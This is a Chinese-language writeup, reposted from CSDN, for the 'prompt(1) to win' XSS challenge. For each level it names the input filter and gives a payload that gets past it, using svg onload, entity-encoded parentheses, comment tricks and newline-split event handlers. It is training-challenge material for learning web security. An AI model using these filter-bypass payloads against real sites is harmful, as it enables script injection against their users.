prompt(1) to win writeup

转载自http://blog.csdn.net/sinat_25449961/article/details/69361520

0

没有任何过滤

"><script>prompt(1)</script>
或者
"><svg/onload=prompt(1)>


1

过滤了大于号>,采用注释符//绕过

aa<svg/onload=prompt(1)//


2

过滤了左括号(,使用<svg>标签绕过。在SVG向量里面的<script>元素(或者其他CDATA元素 ),会先进行xml解析。因此&#x28;(十六进制)或者&#40;(十进制)或者&lpar;(html实体编码)会被还原成(。

<svg><script>prompt&#40;1)</script>
或者
<svg><script>prompt&#40;1)<b>
或者

<script>eval.call`${'prompt\x281)'}`</script>
 
 
  • 1

或者

<script>eval.call`${'prompt\x281)'}`</script>
 
 
  • 1

3

过滤了-->,可用--!>代替

a--!><script>prompt(1)</script>
或者
--!><svg/onload=prompt(1)


4


5

过滤了onxxx,过滤了>,通过回车符号绕过onxxx过滤

aa" type=image src=x onerror
="prompt(1)

6

仔细看源码

javascript:prompt(1)#{"action":1}


7

使用“和=构造payload

"><svg/a=#"onload='/*#*/prompt(1)'


  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值